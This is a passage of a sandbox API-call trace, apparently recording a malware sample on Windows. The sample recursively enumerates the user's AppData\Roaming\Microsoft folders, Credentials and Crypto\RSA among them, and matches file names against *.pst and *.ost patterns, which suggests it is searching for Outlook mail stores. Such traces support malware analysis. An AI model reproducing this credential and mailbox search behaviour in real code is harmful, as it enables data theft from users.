pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft" [0249.279] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\*" [0249.279] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\*", lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 0x44044f0 [0249.279] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.279] FindNextFileW (in: hFindFile=0x44044f0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0249.279] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.279] FindNextFileW (in: hFindFile=0x44044f0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0249.279] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.279] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft", pszFile="Access" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access" [0249.279] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\*" [0249.279] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x44056f0 [0249.279] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.279] FindNextFileW (in: hFindFile=0x44056f0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0249.279] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.279] FindNextFileW (in: hFindFile=0x44056f0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0249.279] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.279] PathMatchSpecW (pszFile="AccessCache.accdb", pszSpec="*.pst") returned 0 [0249.279] PathMatchSpecW (pszFile="AccessCache.accdb", pszSpec="*.ost") returned 0 [0249.279] FindNextFileW (in: hFindFile=0x44056f0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0249.279] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.279] PathMatchSpecW (pszFile="System.mdw", pszSpec="*.pst") returned 0 [0249.279] PathMatchSpecW (pszFile="System.mdw", pszSpec="*.ost") returned 0 [0249.279] FindNextFileW (in: hFindFile=0x44056f0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0 [0249.279] FindClose (in: hFindFile=0x44056f0 | out: hFindFile=0x44056f0) returned 1 [0249.280] FindNextFileW (in: hFindFile=0x44044f0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0249.280] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.280] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft", pszFile="AddIns" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns" [0249.280] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\*" [0249.280] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\AddIns\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x4405510 [0249.384] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.384] FindNextFileW (in: hFindFile=0x4405510, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0249.384] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.384] FindNextFileW (in: hFindFile=0x4405510, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0 [0249.384] FindClose (in: hFindFile=0x4405510 | out: hFindFile=0x4405510) returned 1 [0249.384] FindNextFileW (in: hFindFile=0x44044f0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0249.384] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.384] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft", pszFile="Bibliography" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography" [0249.384] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\*" [0249.384] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x4404790 [0249.384] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.384] FindNextFileW (in: hFindFile=0x4404790, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0249.384] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.384] FindNextFileW (in: hFindFile=0x4404790, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0249.384] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.384] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography", pszFile="Style" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style" [0249.384] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*" [0249.384] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Bibliography\\Style\\*", lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0x4404f70 [0249.515] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.515] FindNextFileW (in: hFindFile=0x4404f70, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0249.515] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.515] FindNextFileW (in: hFindFile=0x4404f70, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0249.515] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.516] PathMatchSpecW (pszFile="APASixthEditionOfficeOnline.xsl", pszSpec="*.pst") returned 0 [0249.516] PathMatchSpecW (pszFile="APASixthEditionOfficeOnline.xsl", pszSpec="*.ost") returned 0 [0249.516] FindNextFileW (in: hFindFile=0x4404f70, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0249.516] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.516] PathMatchSpecW (pszFile="CHICAGO.XSL", pszSpec="*.pst") returned 0 [0249.516] PathMatchSpecW (pszFile="CHICAGO.XSL", pszSpec="*.ost") returned 0 [0249.516] FindNextFileW (in: hFindFile=0x4404f70, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0249.516] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.516] PathMatchSpecW (pszFile="GB.XSL", pszSpec="*.pst") returned 0 [0249.516] PathMatchSpecW (pszFile="GB.XSL", pszSpec="*.ost") returned 0 [0249.516] FindNextFileW (in: hFindFile=0x4404f70, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0249.516] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.516] PathMatchSpecW (pszFile="GostName.XSL", pszSpec="*.pst") returned 0 [0249.516] PathMatchSpecW (pszFile="GostName.XSL", pszSpec="*.ost") returned 0 [0249.516] FindNextFileW (in: hFindFile=0x4404f70, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0249.516] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.516] PathMatchSpecW (pszFile="GostTitle.XSL", pszSpec="*.pst") returned 0 [0249.516] PathMatchSpecW (pszFile="GostTitle.XSL", pszSpec="*.ost") returned 0 [0249.516] FindNextFileW (in: hFindFile=0x4404f70, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0249.516] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.516] PathMatchSpecW (pszFile="HarvardAnglia2008OfficeOnline.xsl", pszSpec="*.pst") returned 0 [0249.516] PathMatchSpecW (pszFile="HarvardAnglia2008OfficeOnline.xsl", pszSpec="*.ost") returned 0 [0249.516] FindNextFileW (in: hFindFile=0x4404f70, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0249.516] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.516] PathMatchSpecW (pszFile="IEEE2006OfficeOnline.xsl", pszSpec="*.pst") returned 0 [0249.516] PathMatchSpecW (pszFile="IEEE2006OfficeOnline.xsl", pszSpec="*.ost") returned 0 [0249.516] FindNextFileW (in: hFindFile=0x4404f70, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0249.516] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.516] PathMatchSpecW (pszFile="ISO690.XSL", pszSpec="*.pst") returned 0 [0249.516] PathMatchSpecW (pszFile="ISO690.XSL", pszSpec="*.ost") returned 0 [0249.516] FindNextFileW (in: hFindFile=0x4404f70, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0249.516] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.517] PathMatchSpecW (pszFile="ISO690Nmerical.XSL", pszSpec="*.pst") returned 0 [0249.517] PathMatchSpecW (pszFile="ISO690Nmerical.XSL", pszSpec="*.ost") returned 0 [0249.517] FindNextFileW (in: hFindFile=0x4404f70, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0249.517] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.517] PathMatchSpecW (pszFile="MLASeventhEditionOfficeOnline.xsl", pszSpec="*.pst") returned 0 [0249.517] PathMatchSpecW (pszFile="MLASeventhEditionOfficeOnline.xsl", pszSpec="*.ost") returned 0 [0249.517] FindNextFileW (in: hFindFile=0x4404f70, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0249.517] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.517] PathMatchSpecW (pszFile="SIST02.XSL", pszSpec="*.pst") returned 0 [0249.517] PathMatchSpecW (pszFile="SIST02.XSL", pszSpec="*.ost") returned 0 [0249.517] FindNextFileW (in: hFindFile=0x4404f70, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0249.517] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.517] PathMatchSpecW (pszFile="TURABIAN.XSL", pszSpec="*.pst") returned 0 [0249.517] PathMatchSpecW (pszFile="TURABIAN.XSL", pszSpec="*.ost") returned 0 [0249.517] FindNextFileW (in: hFindFile=0x4404f70, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0 [0249.517] FindClose (in: hFindFile=0x4404f70 | out: hFindFile=0x4404f70) returned 1 [0249.518] FindNextFileW (in: hFindFile=0x4404790, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0 [0249.518] FindClose (in: hFindFile=0x4404790 | out: hFindFile=0x4404790) returned 1 [0249.518] FindNextFileW (in: hFindFile=0x44044f0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0249.518] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.518] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft", pszFile="Credentials" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials" [0249.518] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\*" [0249.518] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Credentials\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x44042b0 [0249.518] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.518] FindNextFileW (in: hFindFile=0x44042b0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0249.518] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.518] FindNextFileW (in: hFindFile=0x44042b0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0 [0249.518] FindClose (in: hFindFile=0x44042b0 | out: hFindFile=0x44042b0) returned 1 [0249.518] FindNextFileW (in: hFindFile=0x44044f0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0249.518] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.518] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft", pszFile="Crypto" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto" [0249.519] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\*" [0249.519] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x4404790 [0249.519] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.519] FindNextFileW (in: hFindFile=0x4404790, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0249.519] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.519] FindNextFileW (in: hFindFile=0x4404790, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0249.519] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.519] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto", pszFile="RSA" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA" [0249.519] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*" [0249.519] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\*", lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0x4404f70 [0249.526] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.526] FindNextFileW (in: hFindFile=0x4404f70, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0249.526] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.526] FindNextFileW (in: hFindFile=0x4404f70, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0249.526] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0249.526] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA", pszFile="S-1-5-21-1462094071-1423818996-289466292-1000" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000" [0249.526] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\*" [0249.526] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-1462094071-1423818996-289466292-1000\\*", lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0x5d76c10 [0250.926] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.926] FindNextFileW (in: hFindFile=0x5d76c10, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 1 [0250.926] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.926] FindNextFileW (in: hFindFile=0x5d76c10, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 1 [0250.926] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.926] PathMatchSpecW (pszFile="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", pszSpec="*.pst") returned 0 [0250.926] PathMatchSpecW (pszFile="46a78fa46b43fb180b4fa21773f8ff3e_427a1946-e0ff-4097-8c9e-ca2c1e22780b", pszSpec="*.ost") returned 0 [0250.926] FindNextFileW (in: hFindFile=0x5d76c10, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 1 [0250.926] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.926] PathMatchSpecW (pszFile="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", pszSpec="*.pst") returned 0 [0250.926] PathMatchSpecW (pszFile="83aa4cc77f591dfc2374580bbd95f6ba_427a1946-e0ff-4097-8c9e-ca2c1e22780b", pszSpec="*.ost") returned 0 [0250.926] FindNextFileW (in: hFindFile=0x5d76c10, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0 [0250.926] FindClose (in: hFindFile=0x5d76c10 | out: hFindFile=0x5d76c10) returned 1 [0250.927] FindNextFileW (in: hFindFile=0x4404f70, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0 [0250.927] FindClose (in: hFindFile=0x4404f70 | out: hFindFile=0x4404f70) returned 1 [0250.927] FindNextFileW (in: hFindFile=0x4404790, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0 [0250.927] FindClose (in: hFindFile=0x4404790 | out: hFindFile=0x4404790) returned 1 [0250.927] FindNextFileW (in: hFindFile=0x44044f0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0250.927] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.927] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft", pszFile="Document Building Blocks" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks" [0250.927] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*" [0250.927] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x5d767f0 [0250.930] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.930] FindNextFileW (in: hFindFile=0x5d767f0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0250.930] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.930] FindNextFileW (in: hFindFile=0x5d767f0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0250.930] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.930] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks", pszFile="1033" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033" [0250.930] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*" [0250.930] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*", lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0x5d76c10 [0250.931] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.931] FindNextFileW (in: hFindFile=0x5d76c10, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0250.931] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.931] FindNextFileW (in: hFindFile=0x5d76c10, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 1 [0250.931] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.931] PathCombineW (in: pszDest=0x235e370, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033", pszFile="16" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16" [0250.931] PathCombineW (in: pszDest=0x235de90, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*" [0250.931] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\*", lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0x5c0f850 [0250.934] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.934] FindNextFileW (in: hFindFile=0x5c0f850, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 1 [0250.934] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.934] FindNextFileW (in: hFindFile=0x5c0f850, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 1 [0250.934] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.934] PathMatchSpecW (pszFile="Built-In Building Blocks.dotx", pszSpec="*.pst") returned 0 [0250.934] PathMatchSpecW (pszFile="Built-In Building Blocks.dotx", pszSpec="*.ost") returned 0 [0250.934] FindNextFileW (in: hFindFile=0x5c0f850, lpFindFileData=0x235dc40 | out: lpFindFileData=0x235dc40) returned 0 [0250.934] FindClose (in: hFindFile=0x5c0f850 | out: hFindFile=0x5c0f850) returned 1 [0250.934] FindNextFileW (in: hFindFile=0x5d76c10, lpFindFileData=0x235e120 | out: lpFindFileData=0x235e120) returned 0 [0250.934] FindClose (in: hFindFile=0x5d76c10 | out: hFindFile=0x5d76c10) returned 1 [0250.934] FindNextFileW (in: hFindFile=0x5d767f0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0 [0250.934] FindClose (in: hFindFile=0x5d767f0 | out: hFindFile=0x5d767f0) returned 1 [0250.935] FindNextFileW (in: hFindFile=0x44044f0, lpFindFileData=0x235eae0 | out: lpFindFileData=0x235eae0) returned 1 [0250.935] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.935] PathCombineW (in: pszDest=0x235ed30, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft", pszFile="Excel" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel" [0250.935] PathCombineW (in: pszDest=0x235e850, pszDir="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel", pszFile="*" | out: pszDest="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\*" [0250.935] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Excel\\*", lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 0x5c0feb0 [0250.942] WaitForSingleObject (hHandle=0x458, dwMilliseconds=0x0) returned 0x102 [0250.942] FindNextFileW (in: hFindFile=0x5c0feb0, lpFindFileData=0x235e600 | out: lpFindFileData=0x235e600) returned 1 [0250.942] WaitForSingleObject 